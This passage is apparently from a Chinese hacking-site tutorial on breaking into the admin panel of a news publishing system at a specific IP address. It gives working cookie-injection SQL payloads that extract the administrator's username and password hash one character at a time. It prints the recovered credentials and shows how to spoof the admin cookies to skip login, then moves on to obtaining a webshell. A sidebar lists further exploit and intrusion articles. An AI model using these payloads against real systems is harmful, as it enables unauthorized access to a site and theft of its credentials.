[组图]对讯时新闻发布系统的艰难突破
然后在访问http://222.90.4.20/news/admin_news_view.asp,返回如图3:
说明我们提交的url已经有参与了sql查询,而且查询所得结果为真。再提交:
javascript:alert(document.cookie="newsid="+escape("26 and (select asc(mid(user,1,1)) from [admin] where id=1)=97"))
返回如图4所示:
Click here to open new window CTRL+Mouse wheel to zoom in/out
判断id=1的user(管理员)的第一个字符的ascii码值是否为97。相信大家以前看过花花的文章,大概的cookie注入也就这样了。下面是猜密码的。
javascript:alert(document.cookie="newsid="+escape("26 and (select asc(mid(pass,1,1)) from [admin] where id=1)=97"))
通过一一猜解所得的用户名和密码的ASSCII分别是97 100 109 105 110,50 49 50 51 50 102 50 57 55 97 53 55 97 53 97 55 52 51 56 57 52 97 48 101 52 97 56 48 49 102 99 51,转换后的结果分别是admin和21232f297a57a5a743894a0e4a801fc3。然后我们不必去破解密码,拿出老兵叔的 cookie欺骗工具,在cookies栏里输入:admindj=1; adminpass=21232f297a57a5a743894a0e4a801fc3; adminuser=admin; (保持绿色小球处于按下状态)然后在address栏里输入:http://222.90.4.20/news/admin_index.asp,提交!这样我们就可以不经登陆直接进到后台了。如图5所示:
进到后台就是拿WEBSHELL了。打开网友投稿,如图6所示:
| 对讯时新闻发布系统的艰难突破 | 04-16 | |
| 美国暴雪[魔兽世界] 官方程序漏洞 | 04-16 | |
| 动网论坛(SQL版)后台注入方法 | 04-16 | |
| 渗透中用openrowset搞shell的方法 | 04-12 | |
| 记一次对在线挂机网站的渗透 | 04-10 | |
| 百度再现XSS高危漏洞 | 04-10 | |
| phpwind 从后台拿webshell的三种 | 04-09 | |
| Discuz 5.0 0day + PM短信饶过方 | 04-09 | |
| [0day]PHPWind 5.x Exploits GUI | 04-07 | |
| dxbbs漏洞(通杀7.3以前所有版本) | 04-06 | |
| 记对一足球推荐站点的渗透 | 04-06 | |
| 注射DB_ONER权限并且主机与数据库 | 04-06 | |
您现在的位置: